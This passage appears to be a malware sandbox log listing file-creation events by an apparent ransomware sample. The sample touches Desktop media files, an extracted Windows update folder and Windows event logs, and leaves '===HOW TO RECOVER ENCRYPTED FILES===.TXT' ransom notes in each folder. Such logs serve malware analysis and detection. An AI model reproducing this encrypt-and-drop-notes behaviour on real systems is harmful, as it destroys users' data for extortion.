3 | |
| Create | C:\Users\FD1HVy\Desktop\PoSOTNP0h8PW0cv9JY.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Windows6.1-KB958488-v6001-x86.msu | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\PYG0GG.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1025\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1025\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1025\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\qC7mNPu3xDIyN G.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1028\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1028\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1028\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\QNoEEObXXbIbCi.pps | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1029\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1029\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1029\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\r96TLtH01OgABMOB.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1030\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1030\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1030\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\Sfe2_dbPQXp_kb.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1031\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1031\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1031\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\Tg-00W-azMp.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1032\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1032\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1032\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\Vbk14Vwygp7FMg.pptx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1033\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1033\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1033\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\vryumXfZ_mlOds.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1035\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1035\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1035\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\xU3qfTnDgsLwhKy.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\zFTRnFVUuU.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1036\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1036\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1036\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\BlYUtbvj0K53q2DwJDj.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1037\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1037\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1037\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\hfSX6yvX9UNfP4.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1038\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1038\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1038\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\JKKmbRVB4.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1040\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1040\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\kXL7xCl.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1040\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\QSw3qQANpl.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1041\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1041\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1041\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\saONJ.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1042\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1042\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1042\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\Th2bibuMEW.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1043\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1043\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1043\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\XqRm8ccd.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1044\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1044\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1044\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\O9r7lO\ywhU1A-Df.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1045\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1045\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1045\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1046\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1046\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1046\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1049\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1049\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1049\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1053\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1053\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1053\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1055\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\1055\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\1055\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\2052\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\2052\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\2052\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\2070\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\2070\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\2070\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\3076\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\3076\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\3076\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\3082\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\3082\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\3082\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Client\Parameterinfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Client\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\Client\UiInfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Extended\Parameterinfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Extended\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\Extended\UiInfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Print.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\Graphics\Rotate1.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Rotate2.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Rotate3.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Rotate4.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Rotate5.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Rotate6.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Rotate7.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Rotate8.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Save.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\Setup.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\stop.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\SysReqMet.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\SysReqNotMet.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Graphics\warn.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Application.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Logs\HardwareEvents.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Internet Explorer.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Key Management Service.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppLocker%4EXE and DLL.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppReadiness%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppReadiness%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-International%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
